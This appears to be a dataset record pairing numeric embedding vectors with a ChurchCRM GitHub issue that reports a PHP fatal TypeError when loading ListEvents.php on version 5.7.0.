0.03852665796875954, 0.014143919572234154, -0.011087452992796898, 0.02476910687983036, -0.005405737087130547, 0.008417356759309769, 0.004122435115277767, 0.005726562347263098, -0.03198595717549324, 0.0066407425329089165, 0.001964624971151352, 0.026411181315779686, 0.0052263508550822735, -0.006468256004154682, 0.018035221844911575, 0.023127032443881035, -0.020063666626811028, 0.003915451001375914, -0.037201955914497375, 0.01608956977725029, 0.007154753431677818, -0.016006777063012123, 0.02547285333275795, 0.0003132791898678988, -0.0055540758185088634, 0.007637716364115477, 0.01618616282939911, 0.017179686576128006, -0.01599297858774662, 0.00912800244987011, -0.000662780599668622, 0.010956362821161747, 0.008044784888625145, 0.014157718047499657, -0.0015092596877366304, -0.020450036972761154, 0.012149971909821033, 0.0029340009205043316, -0.024644916877150536, 0.014695877209305763, 0.005236699711531401, -0.007761906832456589, 0.0028943289071321487, -0.022713065147399902, -0.010880468413233757, 0.0012419051490724087, 0.00485377898439765, 0.0002246640797238797, 0.005588572937995195, -0.010225018486380577, 0.018587179481983185, 0.009790351614356041, -0.020367244258522987, -0.0017645402112975717, 0.010839072056114674, -0.007658415008336306, -0.030330082401633263, 0.002690794412046671, 0.022782059386372566, -0.025707436725497246, 0.0031944559887051582, -0.025293467566370964, 0.018421592190861702, -0.0026304239872843027, 0.011363431811332703, -0.004281122703105211, -0.04501216113567352, -0.004284572787582874, 0.010942564345896244, -0.004129334352910519, -0.0037015671841800213, -0.007672213949263096, 0.007520425599068403, -0.0007460055057890713, 0.005388488061726093, 0.005357440561056137, -0.011873993091285229, -0.01526163425296545, -0.026825150474905968, 0.005022816359996796, -0.009590267203748226, -0.015192639082670212, -0.024603519588708878, -0.019456513226032257, 0.013046903535723686, -0.017317676916718483, -0.004001694265753031, 0.006523451767861843, 0.024437932297587395, 0.008065483532845974, 0.024244748055934906, 0.002487259916961193, -0.0027770379092544317, -0.005357440561056137, 0.008507049642503262, 0.021512556821107864, -0.009790351614356041, 0.037008773535490036, -0.015868786722421646, -0.006123282015323639, -0.008231070823967457, -0.039326995611190796, 0.018297402188181877, 0.011080553755164146, 0.01781443879008293, -0.004657144192606211, 0.004125884734094143, -0.00925909262150526, 0.01453028991818428, -0.005374689120799303, 0.012729527428746223, 0.012729527428746223, -0.018283603712916374, -0.018449191004037857, -0.0028063606005162, 0.014254311099648476, -0.021553952246904373, 0.0077481078915297985, -0.018835561349987984, -0.018297402188181877, -0.007727409712970257, 0.012577738612890244, 0.001021984382532537, -0.025431456044316292, -0.02027065120637417, -0.00027878183755092323, -0.01614476554095745, 0.003384191542863846, -0.0016343126771971583, -0.01177740003913641, 0.0123569555580616, -0.00453985296189785, 0.010369908064603806, 0.017138291150331497, 0.005861102137714624, 0.018932154402136803, 0.0013850692193955183, 0.006647642236202955, 0.009383282624185085, 0.004029292147606611, 0.0008180187433026731, 0.0008710584370419383, -0.006958118174225092, -0.009797251783311367, -0.010908066295087337, 0.030302485451102257, 0.004143133293837309, 0.02668716013431549, -0.005633419379591942, 0.027777276933193207, -0.00397409638389945, 0.02925376407802105, -0.022230101749300957, -0.01618616282939911, 0.009907643310725689, -0.00007373811968136579, -0.010038732551038265, -0.0039016518276184797, -0.01508224755525589, 0.018642375245690346, -0.017690248787403107, 0.003687768243253231, 0.024327540770173073, -0.008569145575165749, 0.021567752584815025, 0.0009288415312767029, -0.028315436094999313, -0.01952550746500492, 0.005471282172948122, 0.014640681445598602, 0.018435390666127205, -0.004032741766422987, -0.007058160845190287, 0.009604066610336304, 0.016862312331795692, -0.01755225844681263, 0.001099603483453393, -0.002309598494321108, 0.03593245521187782, 0.002695969073101878, -0.01648974046111107, 0.01806282065808773, 0.0194151159375906, -0.01694510504603386, 0.01684851199388504, 0.00036588768125511706, 0.012991707772016525, -0.00173090526368469, 0.025638440623879433, 0.019939476624131203, -0.009748955257236958, -0.004612297751009464, -0.006385461892932653, -0.009500574320554733, -0.019691094756126404, 0.0007511801086366177, -0.00792059488594532, 0.011128849349915981, 0.007720510009676218, 0.005540276877582073, -0.0036463714204728603, -0.003515281481668353, 0.012715728022158146, -0.004701990634202957, 0.02174713835120201, 0.009010711684823036, -0.005426435265690088, 0.0015040850266814232, 0.006375113036483526, 0.015303030610084534, -0.004122435115277767, -0.015165041200816631, 0.011936088092625141, -6.030301165083074e-7, 0.015454819425940514, -0.028674209490418434, -0.0020681170281022787, 0.014930459670722485, -0.017786841839551926, 0.00999043695628643, 0.011266838759183884, -0.007354837842285633, 0.00226302701048553, -0.018435390666127205, -0.019911877810955048, 0.016420746222138405, -0.0033807416912168264, -0.006551049649715424, 0.004843430127948523, -0.01311589777469635, -0.002432064153254032, 0.00202499539591372, -0.0010469950502738357, 0.030882040038704872, 0.009679960086941719, -0.0158963855355978, 0.003836106974631548, 0.0027718632481992245, -0.0011892965994775295, 0.00690982211381197, -0.006664890795946121, -0.012494944967329502, 0.019663497805595398, -0.004398413933813572, 0.014833866618573666, -0.006695938296616077, -0.007658415008336306, -0.009866246022284031, -0.006357864011079073, 0.005409186705946922, -0.0065682982094585896, -0.007341038901358843, 0.0003117699234280735, 0.014171517454087734, 0.00862434133887291, 0.007934393361210823, -0.00453985296189785, -0.009328086860477924, 0.027818674221634865, 0.006016340106725693, 0.009031410329043865, -0.006526901386678219, -0.011715305037796497, 0.0031530591659247875, -0.025362461805343628, -0.01865617372095585, -0.014889062382280827, 0.023941170424222946, -0.006927070673555136, -0.00001617063935555052, 0.005757610313594341, 0.004508805461227894, 0.010977061465382576, 0.016420746222138405, -0.02203691564500332, 0.0060611870139837265, 0.012791622430086136, -0.0028029107488691807, -0.00485377898439765, -0.006019790191203356, 0.013778246939182281, 0.003315196605399251, 0.003939598798751831, 0.004495006520301104, -0.003749863477423787, -0.006764933001250029, -0.00032168792677111924, 0.014047326520085335, 0.00427422346547246, 0.007361737545579672, -0.010901167057454586, 0.02659056894481182, -0.016669126227498055, 0.021112386137247086, -0.0052229007706046104, -0.009797251783311367, -0.006654541473835707, -0.006740785203874111, 0.006689039058983326, 0.01311589777469635, 0.016917508095502853, -0.003070265520364046, -0.0007848150562494993, 0.004029292147606611, -0.017069295048713684, -0.00040987180545926094, -0.01855958253145218, 0.004495006520301104, -0.015565210953354836, -0.009010711684823036, -0.006613144651055336, 0.011949886567890644, -0.005999091546982527, 0.032620709389448166, 0.0028960537165403366, 0.00046053979895077646, 0.03527010604739189, 0.001348846941255033, 0.012819220311939716, 0.004229377023875713, -0.007485928013920784, -0.008582944050431252, 0.017469465732574463, -0.021167581900954247, 0.012922712601721287, 0.007182351313531399, -0.008044784888625145, 0.008672636933624744, -0.010349209420382977, 0.006730435881763697, -0.02799805998802185, -0.014281908981502056, 0.014447496272623539, 0.0034756094682961702, -0.00693741999566555, 0.003470434807240963, -0.0005260847974568605, 0.000280506705166772, -0.0028667310252785683, 0.009369484148919582, -0.010480299592018127, 0.009114203974604607, 0.015372025780379772, -0.014847666025161743, 0.0035532284528017044, 0.011059855110943317, 0.009562669321894646, 0.0072789439000189304, 0.013274585828185081, 0.03568407520651817, -0.006454457063227892, -0.0023992916103452444, -0.009210796095430851, -0.02002226933836937, 0.006544149946421385, 0.0064924038015306, 0.020960599184036255, 0.0029736727010458708, -0.014068025164306164, -0.003539429511874914, -0.0015627306420356035, 0.0033307205885648727, -0.010066330432891846, -0.02260267361998558, 0.00017744582146406174, -0.008520849049091339, 0.00844495464116335, -0.014081823639571667, 0.027777276933193207, 0.024644916877150536, -0.018187010660767555, 0.020519033074378967, 0.010852870531380177, -0.006244022864848375, 0.01170150563120842, -0.0004950371803715825, 0.0012617410393431783, -0.006357864011079073, -0.011963685974478722, 0.014240511693060398, 0.013233188539743423, 0.02819124609231949, -0.00013432411651592702, -0.013930035755038261, -0.009528172202408314, -0.02986091934144497, 0.019580703228712082, -0.021912725642323494, -0.00024600932374596596, 0.011680807918310165, 0.012011982500553131, 0.02845342643558979, 0.006840827409178019, 0.004608847666531801, -0.018035221844911575, 0.00006624571688007563, 0.000732637767214328, -0.02380318194627762, 0.005043514538556337, -0.0031151119619607925, -0.001964624971151352, -0.010231918655335903, 0.01377134770154953, -0.01735907420516014, -0.009328086860477924, 0.009114203974604607, -0.01505464967340231, 0.012902013957500458, -0.014199115335941315, 0.024506928399205208, -0.012867516838014126, -0.013150394894182682, 0.0026683711912482977, 0.0010797674767673016, -0.007755007594823837, -0.009424679912626743, -0.01694510504603386, 0.003725715447217226, 0.016862312331795692, -0.002666646149009466, -0.00011168521450599656, -0.013398775830864906, -0.01584118977189064, 0.00002619643601065036, 0.0060611870139837265, 0.03344864398241043, -0.020822608843445778, -0.014723475091159344, -0.005902498960494995, 0.008900320157408714, 0.003642921568825841, 0.003984445706009865, 0.001902529620565474, 0.00988694466650486, 0.005957694724202156, -0.013226289302110672, 0.00558512331917882, 0.021609149873256683, 0.010107727721333504, 0.036098040640354156, 0.011722204275429249, -0.026825150474905968, -0.0020560428965836763, 0.0008986563188955188, -0.01624135859310627, 0.008817526511847973, -0.0017162439180538058, 0.0222025029361248, 0.008175875060260296, 0.02668716013431549, -0.0007830901886336505, -0.0097075579687953, -0.0034359374549239874, 0.009997336193919182, 0.02425854653120041, 0.001707619521766901, -0.0010349209187552333, -0.019635898992419243, 0.0002526931930333376, -0.02229909598827362, 0.007699811831116676, 0.013005506247282028, 0.007561822421848774, 0.008465653285384178, 0.010197420604526997, 0.014254311099648476, 0.01865617372095585, 0.005426435265690088, -0.011770500801503658, 0.03157198801636696, -0.017083095386624336, -0.02613520249724388, -0.006944319233298302, -0.019152937456965446, -0.0011754976585507393, 0.005164255388081074, 0.0005441959365271032, 0.006516552064567804, -0.010156024247407913, -0.02062942460179329, 0.0013359104050323367, -0.01831120066344738, -0.03347624093294144, 0.016917508095502853, 0.0247139111161232, 0.006499303504824638, -0.01825600489974022, -0.007341038901358843, -0.013481570407748222, 0.0028184347320348024, 0.002916752127930522, -0.028232643380761147, 0.00854844693094492, -0.014281908981502056, -0.016379348933696747, -0.0025838525034487247, -0.02062942460179329, 0.011839495040476322, -0.009700658731162548, 0.008921018801629543, 0.01811801642179489, -0.002954699331894517, -0.00854844693094492, 0.01720728538930416, -0.013985231518745422, 0.0029891966842114925, 0.0001535132760182023, -0.008493251167237759, 0.007961991243064404, -0.012281062081456184, 0.015579009428620338, 0.005747260991483927, 0.0037222655955702066, -0.005274646915495396, 0.011377230286598206, -0.00008397951751248911, -0.007368636783212423, 0.022312894463539124, -0.0008581219590269029, -0.015675602480769157, -0.010983960703015327, -0.002961598802357912, 0.010721780359745026, 0.0057507106103003025, 0.014081823639571667, 0.010052531957626343, -0.011687707155942917, -0.018297402188181877, -0.00003309590829303488, 0.00048382554086856544, 0.015910184010863304, -0.00867953710258007, -0.012522542849183083, 0.005450583528727293, -0.005371239501982927, -0.01614476554095745, 0.0026718208100646734, -0.0052263508550822735, 0.012232765555381775, -0.0007645478472113609, 0.0018456089310348034, -0.01942891627550125, -0.007023663260042667, -0.0021819581743329763, -0.0007947330013848841, -0.006537250708788633, 0.014061125926673412, 0.020905403420329094, 0.012681230902671814, 0.0053850384429097176, -0.02567983791232109, -0.00012850268103647977, -0.013564364053308964, 0.0010573442559689283, -0.01982908509671688, 0.0036843183916062117, 0.015220236964523792, 0.024851901456713676, 0.01306070201098919, 0.021553952246904373, -0.01912533864378929, 0.0014920110115781426, -0.007023663260042667, -0.017869634553790092, -0.005260847974568605, -0.00910730380564928, 0.022271499037742615, 0.002783937379717827, -0.015868786722421646, 0.003423863323405385, 0.007617018185555935, 0.00918319821357727, -0.012501845136284828, 0.006768383085727692, -0.014985655434429646, -0.016061972826719284, 0.02068462036550045, 0.00025743659352883697, -0.0026631965301930904, 0.0060991342179477215, 0.009955938905477524, 0.007099557667970657, 0.003749863477423787, -0.02834303490817547, 0.028025658801198006, 0.001372995087876916, -0.019083941355347633, -0.0020525932777673006, -0.007989589124917984, 0.011363431811332703, 0.013405675999820232, -0.007789504714310169, -0.02003606967628002, -0.019663497805595398, 0.021208979189395905, -0.021981719881296158, -0.017883433029055595, -0.019083941355347633, -0.011736003682017326, -0.007327239960432053, 0.006982266437262297, 0.0002488122263457626, 0.014295707456767559, 0.013281485065817833, 0.0020008471328765154, 0.0056955148465931416, -0.011466924101114273, -0.007741208653897047, 0.00930738914757967, -0.03182036802172661, -0.006571747828274965, -0.00043790091876871884, -0.016558734700083733, 0.0005739498883485794, 0.003375567030161619, -0.00519530288875103, -0.0064268591813743114, 0.014309506863355637, 0.012791622430086136, -0.002004296751692891, -0.015303030610084534, 0.019884280860424042, 0.00860364269465208, 0.00471923965960741, 0.002463111886754632, 0.005357440561056137, -0.0017145189922302961, 0.010908066295087337, -0.008127579465508461, 0.019028745591640472, 0.009907643310725689, 0.00786539912223816, 0.009376383386552334, 0.01584118977189064, -0.006337165832519531, -0.006168128922581673, -0.01180499792098999, -0.004101736471056938, 0.04192119836807251, 0.0023751435801386833, 0.017124490812420845, 0.004577800165861845, 0.00010855889559024945, -0.0011435876367613673, -0.004795133601874113, 0.015551411546766758, 0.01599297858774662, 0.015316830016672611, -0.004746837541460991, -0.011239240877330303, 0.011342733167111874, 0.003977546002715826, 0.015468617901206017, -0.0014100797707214952, -0.00027490087086334825, -0.001559280906803906, 0.007037462200969458, -0.0007395372376777232, 0.021705741062760353, -0.015758395195007324, 0.004981419537216425, 0.011798098683357239, 0.018393995240330696, -0.01523403637111187, 0.01876656524837017, 0.012632934376597404, -0.0030978634022176266, -0.01526163425296545, -0.018145613372325897, 0.008803727105259895, -0.008686436340212822, 0.016020575538277626, 0.011653210036456585, -0.013033104129135609, -0.02349960431456566, -0.02693554200232029, -0.00918319821357727, 0.010156024247407913, 0.004008593503385782, 0.018932154402136803, 0.0036532708909362555, 0.015454819425940514, 0.02017405815422535, 0.001482524210587144, -0.005902498960494995, 0.0012660532956942916, 0.0184077937155962, 0.005474731791764498, 0.014764871448278427, -0.02133316919207573, -0.0066614411771297455, 0.01871136948466301, 0.008196573704481125, 0.0014135295059531927, 0.03593245521187782, 0.005833504255861044, -0.022230101749300957, 0.00559892226010561, 0.00659589609131217, -0.006802880205214024, 0.017138291150331497, 0.016075771301984787, 0.010162923485040665, -0.008313864469528198, 0.013288384303450584, 0.0013617834774777293, -0.0012617410393431783, 0.008175875060260296, 0.02704593352973461, 0.013909337110817432, 0.022975245490670204, 0.002589027164503932, 0.004753736779093742, 0.014930459670722485, 0.01673812046647072, -0.012522542849183083, 0.01192918885499239, 0.014171517454087734, 0.045674510300159454, 0.03297948092222214, 0.003556678304448724, 0.018131814897060394, 0.005757610313594341, 0.023030441254377365, 0.013750649057328701, 0.011032257229089737, -0.0008098256075754762, 0.0024907097686082125, 0.012391453608870506, -0.0034583606757223606, -0.011494521982967854, 0.013957633636891842, 0.000881407642737031, -0.017193486914038658, -0.0010392330586910248, -0.004726138897240162, -0.002744265366345644, 0.05180124193429947, 0.003798159770667553, 0.006726985797286034, -0.021415963768959045, 0.013502268120646477, -0.00983864814043045, -0.0317927710711956, 0.010093928314745426, 0.010949463583528996, -0.015123644843697548, 0.005378139205276966, -0.012646733783185482, -0.005160805769264698, -0.0097075579687953, -0.003943048883229494, -0.0052263508550822735, 0.021912725642323494, -0.0019387518987059593, 0.012770923785865307, 0.006526901386678219, -0.005402287468314171, -0.011687707155942917, 0.0010625188006088138, 0.010093928314745426, 0.008741632103919983, 0.02062942460179329, -0.01795242913067341, -0.024079160764813423, -0.0009452278027310967, -0.02355480007827282, -0.018283603712916374, 0.0009253917960450053, -0.013495368883013725, -0.02482430264353752, 0.0003876641276292503, -0.004788234364241362, -0.01599297858774662, -0.0043328688479959965, -0.005909398663789034, -0.004698541015386581, -0.040486108511686325, 0.009880045428872108, -0.005740361288189888, 0.015620406717061996, 0.008162076584994793, 0.02003606967628002, -0.010176722891628742, -0.0020008471328765154, -0.024327540770173073, -0.005429885350167751, 0.011522119864821434, 0.020160259678959846, -0.020091265439987183, 0.005657567642629147, -0.009693759493529797, -0.013943834230303764, -0.011128849349915981, 0.0073824357241392136, 0.007596319541335106, -0.003936149179935455, 0.03132360801100731, -0.021208979189395905, -0.0040637897327542305, -0.011287537403404713, 0.028218843042850494, 0.005143557209521532, 0.016627728939056396, 0.005002117715775967, 0.006944319233298302, 0.01603437401354313, 0.02547285333275795, 0.00006522158219013363, -0.014820067211985588, 0.012046479620039463, 0.0017585031455382705, -0.014199115335941315, -0.0018197359750047326, -0.002104339189827442, -0.0077481078915297985, 0.013136596418917179, 0.015275432728230953, -0.006626943591982126, 0.02174713835120201, -0.008941716514527798, 0.012287961319088936, 0.02794286422431469, -0.02330642007291317, -0.007341038901358843, -0.009521272964775562, 0.023996366187930107, 0.018035221844911575, 0.008182775229215622, -0.0022820006124675274, 0.0021388365421444178, 0.022119710221886635, -0.0028029107488691807, -0.0031099373009055853, 0.0026562970597296953, 0.013350480236113071, -0.011204743757843971, 0.01381964422762394, 0.012136172503232956, -0.017717845737934113, 0.003843006445094943, -0.012067178264260292, 0.005757610313594341, 0.017483264207839966, -0.004536403343081474, 0.012619135901331902, 0.022174905985593796, 0.007589420303702354, -0.00787229835987091, -0.004874477628618479, 0.0013307358603924513, -0.002830508630722761, -0.013108998537063599, 0.0023820430506020784, -0.013736850582063198, 0.00789299700409174, 0.022464683279395103, 0.012626035138964653, 0.001887005870230496, 0.019042545929551125, 0.007879197597503662, 0.006126732099801302, 0.01880796253681183, 0.021415963768959045, 0.009507473558187485, -0.0026149002369493246, 0.013578162528574467, -0.012598437257111073, 0.0021940323058515787, -0.021967921406030655, -0.0025614292826503515, 0.04363226518034935, 0.018945952877402306, 0.03924420103430748, -0.019152937456965446, 0.007741208653897047, -0.008355261757969856, -0.005143557209521532, -0.0021664344239979982, -0.0024493129458278418, 0.028619013726711273, -0.02098819613456726, 0.005923197604715824, -0.0017800639616325498, -0.0020025719422847033, -0.016310354694724083, -0.0013885189546272159, -0.004374265670776367, 0.022989043965935707, -0.016917508095502853, -0.01952550746500492, -0.012750226072967052, 0.013246987946331501, 0.019580703228712082, -0.0015937782591208816, -0.003991344943642616, -0.00659589609131217, 0.009072806686162949, 0.014212913811206818, -0.0028512070421129465, 0.029170971363782883, 0.022920049726963043, -0.012598437257111073, 0.004377715289592743, 0.008700234815478325, 0.009397082030773163, -0.0015196088934317231, 0.008182775229215622, 0.01947031170129776, -0.000780071655754, -0.0017817888874560595, -0.0138748399913311, 0.016434544697403908, 0.015496215783059597, -0.016586333513259888, 0.024272345006465912, 0.0068960231728851795, 0.015716999769210815, 0.005930096842348576, 0.002644222928211093, 0.0006584684597328305, 0.01755225844681263, -0.002292349934577942, -0.007982689887285233, 0.006244022864848375, 0.00652000168338418, 0.014889062382280827, -0.016103370115160942, -0.025307266041636467, 0.0075342245399951935, 0.004491556901484728, -0.005719663109630346, -0.0025303817819803953, 0.013102099299430847, 0.004998668096959591, -0.015703199431300163, -0.005709313787519932, -0.009645462967455387, 0.009072806686162949, -0.007368636783212423, 0.014544088393449783, -0.0018369846511632204, -0.0008167250780388713, -0.00006635352474404499, -0.0075342245399951935, 0.013253887183964252, -0.03355903550982475, -0.004701990634202957, 0.006540700327605009, -0.00781710259616375, -0.020850207656621933, 0.02391357347369194, 0.008113780058920383, 0.024079160764813423, 0.003953397739678621, -0.007389335427433252, -0.0018542333273217082, 0.010328510776162148, -0.009528172202408314, 0.0001743194879963994, 0.0068580759689211845, -0.01608956977725029, 0.012005082331597805, -0.009686860255897045, -0.014281908981502056, 0.018283603712916374, -0.007051261141896248, -0.00915560033172369, 0.006016340106725693, 0.012239664793014526, 0.023885974660515785, 0.02966773323714733, 0.012715728022158146, 0.004291472025215626, 0.008962415158748627, 0.010714881122112274, -0.0009141801274381578, 0.015772195532917976, 0.00018984331109095365, -0.01614476554095745, 0.0019628999289125204, -0.0008779579075053334, 0.009445378556847572, 0.0018438841216266155, -0.010652786120772362, 0.0026545722503215075, -0.019691094756126404, -0.0009236669284291565, 0.0247139111161232, -0.0014799368800595403, 0.0035911756567656994, -0.010783876292407513, -0.010294013656675816, 0.009790351614356041, -0.0022285296581685543, 0.019346121698617935, -0.01764885149896145, -0.004501906223595142, 0.0030029956251382828, 0.015123644843697548, 0.00198014872148633, 0.001675709499977529, 0.010038732551038265, 0.025459054857492447, 0.0009236669284291565, 0.011342733167111874, 0.024230947718024254, -0.013177992776036263, 0.005578223615884781, 0.023320218548178673, 0.013930035755038261, -0.00725134601816535, 0.036042846739292145, -0.008224171586334705, -0.006709737237542868, -0.013992130756378174, 0.016682924702763557, -0.00393269956111908, -0.003515281481668353, -0.02997131086885929, -0.026604367420077324, 0.014902861788868904, 0.019152937456965446, 0.010908066295087337, -0.020601825788617134, -0.011025357991456985, 0.013985231518745422, 0.012212066911160946, 0.0036222231574356556, 0.02805325575172901, 0.006513102445751429, -0.006578647531569004, 0.023016640916466713, 0.01700030080974102, 0.016958903521299362, 0.00865193922072649, 0.009472976438701153, -0.0016386248171329498, 0.004981419537216425, 0.016958903521299362, 0.0169037077575922, 0.0034342126455157995, -0.019152937456965446, 0.007775705773383379, -0.012205167673528194, 0.02355480007827282, 0.016310354694724083, 0.017014099285006523, -0.004581249784678221, 0.018587179481983185, 0.004087937530130148, -0.0042397258803248405, -0.002868455834686756, 0.026645764708518982, -0.013605760410428047, 0.015868786722421646, -0.0028270590119063854, -0.02446553111076355, 0.0022043816279619932, 0.004684742074459791, 0.0032186040189117193, 0.000017019598089973442, 0.005705864168703556, -0.007216848433017731, -0.0063130175694823265, -0.000842166889924556, 0.0016670851036906242, -0.0015075347619131207, 0.0039878953248262405, 0.02693554200232029, 0.010190521366894245, 0.012915813364088535, 0.0006455319235101342, 0.0010573442559689283, 0.007554922718554735 ]
null
null
null
null
null
null
null
null
null
[ "ChurchCRM", "CRM" ]
**Description** A clear and concise description of what the reported bug is: ``` Fatal error: Uncaught TypeError: extract(): Argument #1 ($array) must be of type array, null given in /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php:118 Stack trace: #0 /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php(118): extract(NULL) #1 {main} thrown in /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php on line 118 ``` - ChurchCRM version: 5.7.0 - PHP version the server running: 8.2.16 - DB Server and Version the server is running: not relevant **Steps To Reproduce** Steps to reproduce the behavior: Load /ListEvents.php **Expected behavior** A clear and concise description of what you expected to happen. Do not see a fatal error **Screenshots and/or logs** If applicable, please include screenshots or share logs to assist in explaining your issue. 📋 Relevant screenshots: <img width="1032" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/5c6a2938-3688-4086-a1f8-d9ebcd71b304">
Bug: Fatal error when listing null events
https://api.github.com/repos/ChurchCRM/CRM/issues/6950/comments
0
2024-04-20T14:33:03
2024-04-26T15:38:52Z
https://github.com/ChurchCRM/CRM/issues/6950
2,254,579,154
6,950
false
This is a GitHub Issue repo:CRM owner:ChurchCRM Title : Bug: Fatal error when listing null events Issue date: --- start body --- **Description** A clear and concise description of what the reported bug is: ``` Fatal error: Uncaught TypeError: extract(): Argument #1 ($array) must be of type array, null given in /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php:118 Stack trace: #0 /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php(118): extract(NULL) #1 {main} thrown in /home/stpaul10/church.stpaulandresurrection.org/ListEvents.php on line 118 ``` - ChurchCRM version: 5.7.0 - PHP version the server running: 8.2.16 - DB Server and Version the server is running: not relevant **Steps To Reproduce** Steps to reproduce the behavior: Load /ListEvents.php **Expected behavior** A clear and concise description of what you expected to happen. Do not see a fatal error **Screenshots and/or logs** If applicable, please include screenshots or share logs to assist in explaining your issue. 📋 Relevant screenshots: <img width="1032" alt="image" src="https://github.com/ChurchCRM/CRM/assets/5031018/5c6a2938-3688-4086-a1f8-d9ebcd71b304"> --- end body ---
1,222
[ -0.008920881897211075, 0.006858190055936575, 0.0008865039562806487, 0.04157494008541107, -0.00852300226688385, 0.0076155574060976505, -0.04051392897963524, 0.03102065809071064, 0.011273258365690708, -0.022029971703886986, -0.002245926298201084, -0.009702680632472038, -0.023802978917956352, 0.03361734747886658, -0.01873524859547615, -0.008118142373859882, -0.04637742042541504, 0.0032476058695465326, -0.020173199474811554, 0.01988002471625805, -0.009458368644118309, 0.027935344725847244, -0.018679406493902206, 0.03763802722096443, -0.04182623326778412, 0.01929367706179619, -0.017450865358114243, -0.005465610884130001, -0.002008594572544098, 0.005580786615610123, 0.006024038419127464, 0.013632616028189659, -0.0058355689980089664, -0.00720371725037694, 0.02750256285071373, -0.011615295894443989, 0.044869665056467056, 0.01901446282863617, -0.030210936442017555, 0.015035665594041348, 0.00907444953918457, -0.0005972558283247054, -0.023440001532435417, 0.009067469276487827, -0.008257749490439892, 0.004687302280217409, -0.0028724123258143663, -0.022239381447434425, -0.043976180255413055, 0.015231114812195301, -0.03015509434044361, -0.01676679030060768, -0.0035425254609435797, -0.06673210859298706, 0.002366337226703763, -0.06812817603349686, 0.008020417764782906, 0.02236502803862095, -0.036493249237537384, 0.0025216499343514442, -0.011992234736680984, 0.027181467041373253, 0.014239905402064323, 0.011726981028914452, 0.01697620190680027, 0.04461837187409401, 0.008816177025437355, 0.006156665273010731, -0.004802478011697531, 0.008718452416360378, 0.004627969581633806, -0.006366075482219458, 0.03730296716094017, 0.014051436446607113, 0.027418799698352814, -0.005060750991106033, 0.05341360718011856, 0.04347359389066696, -0.03171869367361069, 0.005497022531926632, 0.0006810200284235179, 0.013157952576875687, -0.015398642979562283, 0.007364265155047178, -0.011391924694180489, -0.009933032095432281, -0.000012576892913784832, -0.07566694915294647, -0.032416727393865585, 0.032835546880960464, 0.004038129933178425, 0.027474641799926758, -0.020815391093492508, 0.023384159430861473, 0.01904238387942314, -0.0025129246059805155, 0.022043932229280472, 0.013423205353319645, -0.03682830557227135, -0.029066160321235657, -0.018093056976795197, -0.0399555005133152, -0.0008581462898291647, 0.012585563585162163, 0.03523678705096245, 0.0032877428457140923, 0.004362716339528561, -0.03730296716094017, 0.00044041621731594205, 0.103364959359169, 0.031216107308864594, -0.03950875997543335, -0.010079619474709034, -0.05296686664223671, 0.008872020058333874, 0.03367318958044052, -0.013178893364965916, 0.00933272298425436, 0.0006439369171857834, 0.03146740049123764, -0.016403812915086746, -0.03277970477938652, -0.012808934785425663, -0.007475950755178928, -0.03205375000834465, 0.03733089193701744, 0.04003926366567612, 0.008236808702349663, -0.021038763225078583, 0.001462382497265935, -0.011992234736680984, -0.019419321790337563, 0.004149815533310175, 0.04179831221699715, -0.03998342156410217, -0.03280762583017349, -0.04327814653515816, -0.003671661950647831, 0.010707850567996502, -0.02263028174638748, -0.0555635541677475, -0.01786968484520912, 0.010652007535099983, -0.05651288107037544, -0.018651483580470085, 0.0003317845694255084, 0.03875488042831421, -0.020131317898631096, 0.023747136816382408, -0.02984795905649662, 0.0075038718059659, -0.020159238949418068, 0.02663700096309185, 0.002992823254317045, 0.03467835858464241, -0.003839190350845456, 0.042915165424346924, -0.00864166859537363, -0.04386449232697487, 0.0011430316371843219, -0.021722836419939995, 0.005102633032947779, -0.019335558637976646, -0.0206757839769125, 0.0039962478913366795, 0.024138037115335464, -0.019572889432311058, 0.0022372009698301554, -0.023453962057828903, 0.02529677376151085, -0.012815915048122406, -0.02105272375047207, -0.07103200256824493, -0.00549353240057826, -0.03185829892754555, 0.009228017181158066, 0.0014798333868384361, 0.0029457060154527426, -0.01324869692325592, -0.05263181030750275, 0.023007219657301903, -0.006763955112546682, -0.01622232422232628, -0.02194620855152607, 0.025310734286904335, 0.010030756704509258, -0.010107540525496006, -0.0039822873659431934, 0.028451889753341675, -0.014191043563187122, -0.006100822240114212, -0.008739393204450607, -0.01076369360089302, -0.053636979311704636, -0.033282291144132614, -0.002153436653316021, -0.032109592109918594, -0.02363545075058937, 0.01814889907836914, -0.02864733897149563, 0.046740397810935974, 0.017604433000087738, -0.041463255882263184, 0.01304626651108265, 0.015915188938379288, 0.03582313656806946, 0.03294723480939865, 0.03336605429649353, 0.01584538444876671, -0.012969482690095901, 0.010191305540502071, 0.008913901634514332, 0.00995397288352251, 0.028563575819134712, -0.019921908155083656, -0.005113103426992893, 0.030099252238869667, 0.021834522485733032, 0.025869162753224373, 0.027488602325320244, 0.0035477608907967806, 0.009081429801881313, -0.00029731911490671337, -0.004676831886172295, 0.015231114812195301, -0.006041489541530609, -0.006777916103601456, -0.01371638011187315, -0.030964814126491547, -0.004907183349132538, -0.020368648692965508, -0.0004794625274371356, 0.011957332491874695, -0.009360644035041332, 0.04537224769592285, -0.0012398839462548494, 0.025897083804011345, -0.03889448940753937, 0.01618044264614582, -0.014644766226410866, 0.030490150675177574, 0.01566389575600624, -0.03185829892754555, 0.007161834742873907, 0.01594310998916626, -0.007678380701690912, -0.0019998690113425255, 0.010840477421879768, -0.01915406994521618, 0.025213008746504784, 0.002139476127922535, -0.019586849957704544, -0.004470911808311939, -0.007350304163992405, -0.009653818793594837, -0.016431733965873718, -0.0018916737753897905, 0.01725541613996029, 0.017688196152448654, 0.004230089485645294, -0.006264860276132822, -0.013611674308776855, -0.01746482588350773, -0.004449970554560423, 0.016124598681926727, 0.01852583885192871, -0.028074951842427254, -0.006051959935575724, -0.007936653681099415, -0.006163645535707474, 0.026888292282819748, -0.029066160321235657, -0.01911218650639057, -0.021862443536520004, 0.008173985406756401, -0.00293698045425117, 0.004209148697555065, 0.015440525487065315, 0.005608708132058382, 0.01887485571205616, 0.032556332647800446, 0.009339703246951103, -0.01294156163930893, 0.019056344404816628, 0.009116332046687603, 0.0318024568259716, -0.023440001532435417, -0.015412603504955769, -0.019475165754556656, 0.0347900427877903, -0.02028488554060459, 0.0018881835276260972, -0.019935868680477142, 0.009926051832735538, 